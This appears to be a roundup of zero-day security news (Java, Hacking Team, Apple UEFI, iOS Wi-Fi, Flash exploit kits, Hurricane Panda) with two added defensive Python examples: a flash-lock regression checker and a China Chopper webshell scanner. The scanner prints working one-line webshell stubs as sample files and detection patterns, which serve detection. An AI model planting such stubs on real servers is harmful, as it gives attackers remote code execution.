Trend Micro has issued predictable-but-sensible advice that Java should be switched off, because a zero-day is being exploited in the wild. Researchers said the exploit will hose systems running the latest Java platform. Because there is no patch, they added that users should disable Java until one ships.
The attackers have been linked to Operation Pawn Storm, the campaign behind the 2014 attacks on the North Atlantic Treaty Organisation and the White House, among others: their tactics, techniques, and procedures match those of the same actors.
Spyware company Hacking Team was compromised earlier this week, leading to 400GB of internal files, source code, and emails being made available on torrent sites for anyone to download.
While the leak contains some embarrassing communications, it also exposes serious software flaws. Source code in the leak includes the exploits Hacking Team has been using to break into PCs. Two unpatched vulnerabilities have been identified so far, one affecting Adobe's Flash software and one affecting Microsoft's Windows operating system.
A zero-day vulnerability in the firmware of older Apple computers could be used to slip hard-to-remove malware onto a machine. Pedro Vilaca wrote that the flaw he found builds on previous ones, but this one could be far more dangerous.
Vilaca found it was possible to tamper with an Apple computer's UEFI, the firmware that replaces the BIOS as the low-level code bridging a computer's hardware and operating system at startup. The flash holding the UEFI code is normally locked against writes from users and the operating system. But Vilaca wrote that he found the lock is no longer in place after a computer goes to sleep and reawakens, allowing the firmware to be modified from the running system.
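The practical check that follows from this finding is to snapshot the flash-protection registers before a sleep cycle and again after resume, and flag anything that came back unlocked. The block below is an added example, not code from the article or from Vilaca's write-up. It decodes the Intel PCH registers involved (HSFS bit 15 is FLOCKDN, which freezes the protected-range registers until reset; BIOS_CNTL bits 0, 1 and 5 are BIOSWE, BLE and SMM_BWP; each PRx register carries a write-protect enable in bit 31 with 13-bit base and limit fields in bits 12:0 and 28:16, the layout used by the PCH datasheets of that era, so verify it against your own chipset), and diffs two snapshots. The register values are constructed to mimic the reported behaviour; on real hardware they would be read with a tool such as chipsec.

```python
"""Decode Intel PCH SPI flash-protection registers and diff two snapshots.

Added example, not from the article or from Vilaca's write-up. Register
layouts follow the Intel PCH datasheets (assumed: HSFS.FLOCKDN = bit 15;
BIOS_CNTL BIOSWE/BLE/SMM_BWP = bits 0/1/5; PRx WPE = bit 31, base bits
12:0, limit bits 28:16, both in 4 KiB units). The sample values below are
constructed, not read from a real Mac.
"""
from dataclasses import dataclass

HSFS_FLOCKDN = 1 << 15
BIOS_CNTL_BIOSWE = 1 << 0      # BIOS write enable (must be clear)
BIOS_CNTL_BLE = 1 << 1         # BIOS lock enable (setting BIOSWE traps to SMM)
BIOS_CNTL_SMM_BWP = 1 << 5     # only SMM may write flash
PR_WPE = 1 << 31               # protected range: write protection enable
PR_FIELD_MASK = 0x1FFF


@dataclass(frozen=True)
class FlashProtection:
    flockdn: bool
    bioswe: bool
    ble: bool
    smm_bwp: bool
    protected_ranges: tuple  # (base, limit) for each PRx with WPE set

    def is_locked(self):
        # A sound state: ranges frozen (FLOCKDN), BIOS region not
        # write-enabled, lock bit set, and at least one range protected.
        return (self.flockdn and not self.bioswe and self.ble
                and bool(self.protected_ranges))


def decode(hsfs, bios_cntl, prs):
    """Turn raw HSFS, BIOS_CNTL and PR0..PRn values into a FlashProtection."""
    ranges = []
    for pr in prs:
        if pr & PR_WPE:
            base = (pr & PR_FIELD_MASK) << 12
            limit = (((pr >> 16) & PR_FIELD_MASK) << 12) | 0xFFF
            ranges.append((base, limit))
    return FlashProtection(
        flockdn=bool(hsfs & HSFS_FLOCKDN),
        bioswe=bool(bios_cntl & BIOS_CNTL_BIOSWE),
        ble=bool(bios_cntl & BIOS_CNTL_BLE),
        smm_bwp=bool(bios_cntl & BIOS_CNTL_SMM_BWP),
        protected_ranges=tuple(ranges),
    )


def regressions(before, after):
    """List protections present before sleep that are missing after resume."""
    findings = []
    if before.flockdn and not after.flockdn:
        findings.append("FLOCKDN cleared")
    if before.ble and not after.ble:
        findings.append("BIOS_CNTL.BLE cleared")
    if before.smm_bwp and not after.smm_bwp:
        findings.append("BIOS_CNTL.SMM_BWP cleared")
    if after.bioswe and not before.bioswe:
        findings.append("BIOS_CNTL.BIOSWE set")
    for rng in before.protected_ranges:
        if rng not in after.protected_ranges:
            findings.append("protected range %#x-%#x dropped" % rng)
    return findings


# Constructed snapshots (assumed values, not captured from hardware):
# before sleep everything is locked; after resume FLOCKDN has been lost,
# so the PR registers can now be rewritten by anyone with root.
BEFORE_SLEEP = decode(0x8000, 0x22, [0x8FFF0800, 0, 0, 0, 0])
AFTER_RESUME = decode(0x0000, 0x22, [0x8FFF0800, 0, 0, 0, 0])


def check_after_resume(before=BEFORE_SLEEP, after=AFTER_RESUME):
    """Return the list of regressions; an empty list means resume kept the locks."""
    return regressions(before, after)


if __name__ == "__main__":
    for finding in check_after_resume() or ["no regressions"]:
        print(finding)
```

The diff is deliberately one-directional: only protections that existed before sleep and vanished after resume are reported, so a machine whose firmware never set a protected range in the first place shows up through `is_locked()` rather than as a resume regression.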
Researchers have revealed a zero-day vulnerability in iOS 8 that, when exploited by a malicious wireless hotspot, will repeatedly crash nearby Apple iPhones, iPads and iPods. The attack renders vulnerable iOS devices within range unstable or even entirely unusable by triggering constant reboots.
Anyone can take any router and create a Wi-Fi hotspot that forces you to connect to their network, and then manipulate the traffic to cause apps and the operating system to crash. This is not a denial-of-service where you can't use your Wi-Fi; this is a denial-of-service where you can't use your device even in offline mode.
Zero day actually refers to two things: a zero-day vulnerability or a zero-day exploit. A zero-day vulnerability is a security hole in software, such as a browser or an operating system, that is not yet known to the software maker or to antivirus vendors; a zero-day exploit is the code that attacks such a hole.
This means the vulnerability is also not yet publicly known, though it may already be known to attackers who are quietly exploiting it. Because zero-day vulnerabilities are unknown to software vendors and to antivirus firms, there is no patch available to fix the hole and generally no antivirus signatures to detect the exploit, though antivirus scanners can sometimes still catch a zero-day exploit using heuristics.
Two exploit kits have been outfitted with an exploit for a Flash Player vulnerability that was patched only a week ago, the researcher who goes by the handle Kafeine reported on Tuesday. The integer overflow vulnerability in question can allow attackers to execute arbitrary code via unspecified vectors and is rated critical.
Initial information about it was shared with Adobe via HP's Zero Day Initiative. Researchers are worried about the short time that passed between the patch and the exploit surfacing in the Fiesta and Angler exploit kits. As Kafeine notes, it is technically possible that the exploit was included in the kits even before the patch was available.
A highly advanced adversary dubbed Hurricane Panda has been targeting major infrastructure companies with a zero-day exploit since last spring. Timestamps on the attack tooling suggest the vulnerability has been actively exploited in the wild for at least five months.
CrowdStrike first detected suspicious activity on a 64-bit Windows Server 2008 R2 machine that it attributed to a compromise by the group. It found that the attacks begin with compromising web servers and deploying Chopper webshells, then escalate privileges with a newly discovered local privilege escalation tool that exploits a previously unknown vulnerability.
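Because the intrusion chain starts with a Chopper webshell dropped on a web server, the cheapest detection is a scan of the web root for the China Chopper server stubs, which are one-liners that pass a request parameter straight to `eval`. The block below is an added example and is not CrowdStrike's tooling; it matches the publicly documented PHP, ASP and ASPX stub shapes with regular expressions and walks a directory tree. The file names, the parameter name `chopper` and the sample contents are constructed for the demonstration.

```python
"""Scan a web root for China Chopper-style one-line webshells.

Added example, not CrowdStrike's tooling. The patterns target the
well-known Chopper server stubs:
  PHP   <?php @eval($_POST['pw']);?>
  ASP   <%eval request("pw")%>
  ASPX  <%@ Page Language="Jscript"%><%eval(Request.Item["pw"],"unsafe");%>
Sample files written by demo() are constructed, not real captures.
"""
import os
import re
import shutil
import tempfile

WEB_EXTS = {"php", "php5", "phtml", "asp", "aspx", "ashx", "asmx", "jsp"}

PATTERNS = {
    # PHP: eval over a request superglobal element
    "php": re.compile(
        rb"@?eval\s*\(\s*\$_(?:POST|REQUEST|GET)\s*\[\s*['\"][^'\"]+['\"]\s*\]\s*\)",
        re.I),
    # Classic ASP: eval request("name"), with or without parentheses
    "asp": re.compile(
        rb"\beval\s*\(?\s*Request\s*\(\s*['\"][^'\"]+['\"]\s*\)", re.I),
    # ASP.NET/JScript: eval(Request.Item["name"], "unsafe")
    "aspx": re.compile(
        rb"\beval\s*\(\s*Request\.Item\s*\[\s*['\"][^'\"]+['\"]\s*\]\s*,\s*['\"]unsafe['\"]\s*\)",
        re.I),
}


def scan_bytes(data):
    """Return the matching stub kind for file contents, or None."""
    for kind, rx in PATTERNS.items():
        if rx.search(data):
            return kind
    return None


def scan_file(path):
    try:
        with open(path, "rb") as fh:
            return scan_bytes(fh.read())
    except OSError:
        return None


def scan_tree(root):
    """Walk root and return sorted (relative path, kind) for every hit."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            ext = name.lower().rsplit(".", 1)[-1]
            if ext not in WEB_EXTS:
                continue
            full = os.path.join(dirpath, name)
            kind = scan_file(full)
            if kind:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                hits.append((rel, kind))
    return sorted(hits)


# Constructed sample tree (assumed names and contents, not from an incident).
SAMPLE_FILES = {
    "index.php": b"<?php echo 'hello'; ?>\n",
    "img/x.php": b"<?php @eval($_POST['chopper']);?>",
    "old/a.asp": b"<%eval request(\"chopper\")%>",
    "upload/t.aspx": (b"<%@ Page Language=\"Jscript\"%>"
                      b"<%eval(Request.Item[\"chopper\"],\"unsafe\");%>"),
    "static/logo.png": b"\x89PNG not a script",
}


def demo():
    """Write the sample tree to a temp dir, scan it, clean up, return hits."""
    root = tempfile.mkdtemp(prefix="webroot_")
    try:
        for rel, content in SAMPLE_FILES.items():
            full = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as fh:
                fh.write(content)
        return scan_tree(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for rel, kind in demo():
        print("%-6s %s" % (kind, rel))
```

Regex matching catches the stock stubs but not obfuscated variants (base64-wrapped `eval`, `assert` in place of `eval`, concatenated function names), so in practice pair this with a size heuristic (web scripts under a few hundred bytes that read request input) and with web server logs showing POSTs to recently created script paths.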